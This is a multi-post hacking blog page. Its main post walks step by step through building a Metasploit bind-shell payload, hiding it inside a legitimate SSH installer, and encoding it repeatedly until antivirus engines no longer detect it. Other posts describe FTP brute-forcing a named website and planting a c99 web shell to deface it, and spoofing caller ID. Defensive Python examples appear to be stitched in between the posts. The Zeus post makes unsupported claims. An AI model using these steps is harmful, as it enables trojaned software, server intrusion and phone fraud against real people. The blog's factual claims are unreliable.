Tuesday, 11 June 2013

How To Bypass Antivirus Detection-Making Exe FUD

Notice !!!
This Post is only for Educational Purposes, the author of this post is not responsible for any misuse.

Requirements:
A BackTrack machine, real or virtual. I used BackTrack 5 R3, but other versions of BackTrack work OK too!!!

Purpose:
Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We'll use Metasploit to render malware completely invisible to antivirus.

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:

cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe


You should see the listen.exe file as shown below:

Analyzing the Listener with VirusTotal

Click the "Choose File" button. Navigate to /root and double-click listen.exe. "listen.exe" then appears in the "Choose File" box, as shown below:

On the VirusTotal web page, click the "Scan it!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener

This process will encode the listener and insert it into an innocent SSH client installer.
In BackTrack, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*

You should see the evil_ssh.exe file as shown below:


Scan with VirusTotal

If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.

Encode the Listener Again

This process will encode the listener with several different encoders.

In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*

You should see several files as shown below:


Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now--0 out of 42, when I did it, as shown below. You may see different numbers.
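What the three VirusTotal scans show is a signature engine losing its match each time the bytes are rewritten. A check a defender can run alongside signatures is an entropy scan: the output of a polymorphic encoder such as shikata_ga_nai looks like random data, which ordinary code, strings and resources do not. The Python below is an added example and is not code from the original post, from Metasploit or from VirusTotal. It uses constructed sample buffers in place of real executables (a repeated text string standing in for plain data, seeded pseudo-random bytes standing in for an encoded region), and the window size and threshold are assumptions to tune against your own known-good files.

```python
import math
import random
from collections import Counter
from typing import List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte: 0.0 for empty or
    constant input, 8.0 when all 256 byte values are equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_regions(data: bytes, window: int = 1024,
                         threshold: float = 7.0) -> List[Tuple[int, float]]:
    """Slide a fixed window across the buffer and return (offset, entropy) for
    each window at or above the threshold. Encrypted, compressed and
    polymorphically encoded regions sit close to 8.0; ordinary x86 code,
    strings and resource data usually stay well below 7.0. Window size and
    threshold are assumptions to tune against your own file set."""
    flagged = []
    for offset in range(0, len(data) - window + 1, window):
        entropy = shannon_entropy(data[offset:offset + window])
        if entropy >= threshold:
            flagged.append((offset, round(entropy, 2)))
    return flagged


def suspicious_ratio(data: bytes, window: int = 1024, threshold: float = 7.0) -> float:
    """Fraction of windows flagged: a crude 'how much of this file is opaque?' score."""
    total_windows = max(1, len(data) // window)
    return len(high_entropy_regions(data, window, threshold)) / total_windows


def constructed_samples() -> Tuple[bytes, bytes]:
    """Constructed test inputs, not real binaries: a low-entropy blob of repeated
    text standing in for plain code and data, and a seeded pseudo-random blob
    standing in for the output of a polymorphic encoder."""
    plain = (b"This program cannot be run in DOS mode.\r\n" * 400)[:8192]
    rnd = random.Random(20130611)           # fixed seed so results are reproducible
    encoded = bytes(rnd.getrandbits(8) for _ in range(8192))
    return plain, encoded


if __name__ == "__main__":
    for name, blob in zip(("plain", "encoded"), constructed_samples()):
        print(name, round(shannon_entropy(blob), 2), suspicious_ratio(blob),
              high_entropy_regions(blob)[:2])
```

To run it over a real sample, pass `Path("listen5.exe").read_bytes()` to `suspicious_ratio`. A high ratio is a reason to sandbox or inspect the file, not a verdict on its own: legitimate packers, installers with compressed payloads and embedded images score high too, which is why this belongs next to signature and behaviour checks rather than in place of them.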

How Your Bank Accounts Can Be Stolen With the Zeus Virus

Zeus is a Trojan horse that steals banking information by man-in-the-browser keystroke logging and form grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinessWeek.
That fake page could then ask for your security information and other important data that could easily be sold on the black market.
According to many sources, it has perhaps been confirmed that those pages are being hosted by the Russian Mafia (also known as the Russian Business Network).
Did Facebook Take Action Against It?
The founder of the advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue so that it could take action as soon as possible, but unfortunately he was not satisfied with their response.

Those who are using Windows should be especially careful about this issue. It has been said that Windows devices are heavily infected with this virus. Hence, Mac OS X or Linux is still safe from this virus.

Some countries like the USA and UK are badly infected, though India, Russia, Canada and France are also infected with the virus to a moderate extent. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.

The Zeus virus can also propagate through phishing messages sent from an account that has already been compromised by phishing. That phished account then starts sending messages to your friends containing links to ads, asking them to simply check out a video or product by clicking the link. This way the virus goes viral.

Readers are requested to refrain from clicking such links, because they might end up getting their accounts compromised. The virus is very sophisticated: it can replace the website of a bank with a mimicked page of its own.

Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it.


Regards: By Anshuman Kak

Thursday, 20 December 2012

How to Send Self-Destructing Sensitive Information to Someone via Email

NOTE: ONLY FOR EDUCATIONAL PURPOSE. IT IS TOTALLY ILLEGAL AND YOU WILL BE PUNISHED. SO DON'T TRY...

Have you ever sent private information to someone (maybe a family member needed your credit card number) and then regretted that you had ever done it? This can all be solved with a self-destructing link.

To get started head over to https://oneshar.es/ and click on the Create One Now button.

This will take you to a text box where you can enter the information you want to e-mail to someone.
You can go ahead and click on the Create Link button when you're ready. Don't worry, your information is safe and is sent over an SSL-encrypted connection from your web browser to their servers.
This will give you a link that you can either manually copy to the clipboard, or you can click the link, which will automatically copy it to the clipboard.
Now you can draft your email as you normally would. You should add the link you were given in the last step somewhere in the email. It is up to you whether you would like the recipient to know that the link self-destructs or not.
When the person receives the email, they can click on the link to see the message you generated earlier.
However, if they refresh the page or try clicking on the link again, they are not able to see the information.
The data is also stored in encrypted form on their servers, and when someone views the unique URL that you sent them, your encrypted message is deleted from their system.
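The mechanism just described (ciphertext at rest, record deleted the moment the unique URL is viewed) is small enough to write down in full. The Python below is an added example and is not oneshar.es code; it assumes a design in which the decryption key travels in the URL fragment so the server only ever holds ciphertext, which is an assumption about how such a service can be built, not a description of that site. `BASE_URL`, the store class and all function names are hypothetical, and the SHA-256 counter-mode stream is used only to keep the example dependency-free.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlparse

BASE_URL = "https://example.invalid/s/"   # hypothetical host, stands in for the real service


class OneTimeSecretStore:
    """Server side of a self-destructing link. It only ever holds ciphertext
    plus an integrity tag; the key lives in the URL fragment (after '#'),
    which browsers never send to the server."""

    def __init__(self) -> None:
        self._records: Dict[str, Tuple[bytes, bytes]] = {}

    def put(self, ciphertext: bytes, tag: bytes) -> str:
        token = secrets.token_urlsafe(16)          # unguessable path component
        self._records[token] = (ciphertext, tag)
        return token

    def take(self, token: str) -> Optional[Tuple[bytes, bytes]]:
        # pop() is what makes the link single-use: the first read deletes the
        # record, so a refresh or a second click finds nothing.
        return self._records.pop(token, None)


def _keystream(key: bytes, length: int) -> bytes:
    """Counter-mode keystream from SHA-256, used here only to keep the example
    dependency-free; a production service would use AES-GCM from a vetted library."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def _xor(data: bytes, key: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, _keystream(key, len(data))))


def create_link(store: OneTimeSecretStore, message: str) -> str:
    """Encrypt the message under a fresh random key, store only ciphertext and
    tag, and return a link with the token in the path and the key in the fragment."""
    key = secrets.token_bytes(32)
    ciphertext = _xor(message.encode("utf-8"), key)
    tag = hmac.new(key, ciphertext, "sha256").digest()   # detects tampering or a wrong key
    token = store.put(ciphertext, tag)
    fragment = base64.urlsafe_b64encode(key).decode("ascii").rstrip("=")
    return f"{BASE_URL}{token}#{fragment}"


def open_link(store: OneTimeSecretStore, link: str) -> Optional[str]:
    """Recipient side: the first view returns the message and destroys it;
    every later view, and any view with a wrong key, returns None."""
    parsed = urlparse(link)
    token = parsed.path.rsplit("/", 1)[-1]
    record = store.take(token)          # consumed even if the key below turns out wrong
    if record is None:
        return None
    ciphertext, tag = record
    try:
        padded = parsed.fragment + "=" * (-len(parsed.fragment) % 4)
        key = base64.urlsafe_b64decode(padded)
    except ValueError:
        return None
    if not hmac.compare_digest(tag, hmac.new(key, ciphertext, "sha256").digest()):
        return None
    return _xor(ciphertext, key).decode("utf-8")


def with_wrong_key(link: str) -> str:
    """Same token, a freshly generated (wrong) key: shows that a bad key fails closed."""
    path = link.split("#", 1)[0]
    fragment = base64.urlsafe_b64encode(secrets.token_bytes(32)).decode("ascii").rstrip("=")
    return f"{path}#{fragment}"
```

Two design points worth noticing: the record is consumed even when the key check fails, so a token alone cannot be used for repeated key guessing (the legitimate recipient then sees nothing, which is the safer failure), and because the key is in the fragment, a server log of requested URLs never contains it.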



Posted by: Taylor is our very own Microsoft fanboy; he tries to make the world a better place using technology due to his lack of superpowers.

Wednesday, 21 November 2012

What is Website Defacement? Case Study

Note: Only for educational purposes. Please don't try this on another website. I have not uploaded the full image due to security reasons. It is just a case study with an example.

What Is Website Defacement

Website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.
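Because a defacement is, by definition, a change to the files served from the web root, the basic detection is a hash baseline taken while the site is known-good, re-computed on a schedule and diffed. The Python below is an added example, not part of the original post: it builds the baseline and the comparison, and `demo()` creates a constructed temporary web root, rewrites index.html and drops an unexpected PHP file into image/ so the diff has something to report. The file names and contents there are constructed for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large assets do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(webroot: Path) -> Dict[str, str]:
    """Map every regular file under webroot (relative POSIX path) to its hash."""
    return {
        path.relative_to(webroot).as_posix(): hash_file(path)
        for path in sorted(webroot.rglob("*"))
        if path.is_file()
    }


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Diff two snapshots: content changes, files that appeared, files that vanished.
    Each list is a reason to page someone; 'added' with a script extension in an
    upload or image directory is the classic web-shell signal."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: snapshot a tiny web root, then simulate a defacement
    (index page rewritten, unexpected PHP file dropped into image/) and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "image").mkdir()
        (root / "index.html").write_text("<h1>Welcome to the site</h1>\n")
        (root / "image" / "logo.png").write_bytes(b"\x89PNG constructed placeholder")
        baseline = build_baseline(root)

        (root / "index.html").write_text("<h1>Page replaced by someone else</h1>\n")
        (root / "image" / "c99.php").write_text("<?php /* constructed marker file */ ?>\n")
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

In practice the baseline is stored off the web server (an attacker with write access to the document root can otherwise rewrite it too), and the scheduled run should exclude directories the application legitimately writes to, or the noise will bury the one change that matters.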

Terms:

[SQL] - Structured Query Language
[LFI] - Local File Include
[RFI] - Remote File Include
[XSS] - Cross Site Scripting
[RCE] - Remote Code Execution
[AFD] - Arbitrary File Download
[SCD] - Source Code Disclosure
[PCI] - PHP Code Injection

Defacement Techniques:

Domain hack
FTP protocol
Vulnerable IIS
Vulnerable Apache
Permissions
Exploits
Script, cookie, XSS
Vulnerable OS
Social engineering
Hosting control panel
Forgotten password
Trojans, spyware, etc.
SQL injection
RFI

Tools for Web defacement:

Hydra
C99 Shell
phpbb_defacer
XSSShell039
etc.


Website defacement archive sites

Website Defacement Case Study

To use Brutus and the c99.php shell, we have to go through the following steps:

1. First we need to upload the c99.php shell file and the Brutus application to the particular system (server system), then target the web application, let's say www.babaharinath.com, use the passwords from the commercial word list (a combination of passwords), set type = FTP, and choose "keep connected" for unlimited attempts.

After this, start the brute-force attack.

2. After getting an ID and password, open the victim site in IE by typing ftp.babaharinath.com, then click on the file and log in with the above ID and password.

3. Now upload the c99.php file into the image or cgi-bin folder. After this, again open IE and access http://www.babaharinath.com/image/c99.php

4. After this, choose the index.html file, click on the edit option, and then change the content as you wish.

5. Now, with the help of the c99.php shell file, we can upload new HTML content, delete whatever we want, and even do anything in future without any password.



Posted By: Anshuman Kak

Monday, 12 November 2012

What is VoIP and How Does it Help in a Caller ID Spoofing Attack? Detail

What is VoIP?

Voice-over-Internet Protocol (VoIP) is a protocol optimized for the transmission of voice through the Internet or other packet-switched networks. VoIP systems employ session control protocols to control the set-up and tear-down of calls, as well as audio codecs which encode speech, allowing transmission over an IP network as digital audio via an audio stream. Codec use varies between different implementations of VoIP (and often a range of codecs are used); some implementations rely on narrowband, compressed speech, while others support high-fidelity stereo codecs.






How does VoIP work?

VoIP converts the voice signal from your telephone into a digital signal that can travel over the Internet. If you are calling a regular telephone number, the signal is then converted back at the other end. Depending on the type of VoIP service, you can make a VoIP call from a computer, a special VoIP phone, or a traditional phone. Wireless "hot spots" in public locations such as airports, parks, and cafes allow you to connect to the Internet, and may enable you to use VoIP service wirelessly. If your VoIP service provider assigns you a regular telephone number, then you can receive calls from regular telephones that don't need special equipment.

Advantages of Using VoIP

90% cost saving (cheap call rates)
Great voice quality
3-way call forwarding
Caller ID spoofing
Unlimited calling
Web calling
Free phone call services
Free call forwarding

Top VoIP Companies:

www.callcentric.com

Free Calling sites:

Unlimited Calling Sites:

Caller ID Spoofing Attack

Caller ID spoofing is the practice of causing the telephone network to display a number on the recipient's caller ID display which is not that of the actual originating station; the term is commonly used to describe situations in which the motivation is considered nefarious by the speaker. Just as e-mail spoofing can make it appear that a message came from any e-mail address the sender chooses, caller ID spoofing can make a call appear to have come from any phone number the caller wishes.
The above method is a bit complex; many caller ID spoofing service providers also allow customers to initiate spoofed calls from a web-based interface. Some providers allow entering the name to display along with the spoofed caller ID number, but in most parts of the United States, for example, whatever name the local phone company has associated with the spoofed caller ID number is the name that shows up on the caller ID display. Using a web-based spoofing service involves creating an account with a provider, logging in to their website and completing a form. Most companies require the following basic fields:
1. Source number
2. Destination number
3. Caller ID number
When the user completes this form and clicks a button to initiate the call, the source number is first called. When the source number line is registered, the destination is then called and the two are bridged together.

Advantages:

Show any number on the victim's mobile
Record Outgoing Calls
Listen to your calls online
Include recordings in the email
Download your recordings

Caller ID Spoofing sites:

Caller ID Spoofing Attack:

Sign up with 123spoof.com and purchase 60 minutes, then log in with your PIN number.

This screen will appear. After that we put in all the details: our number, the number to call and the caller ID to show, and click to place a call. Then call the access number of 123spoof.com from your number.

Posted By: Anshuman Kak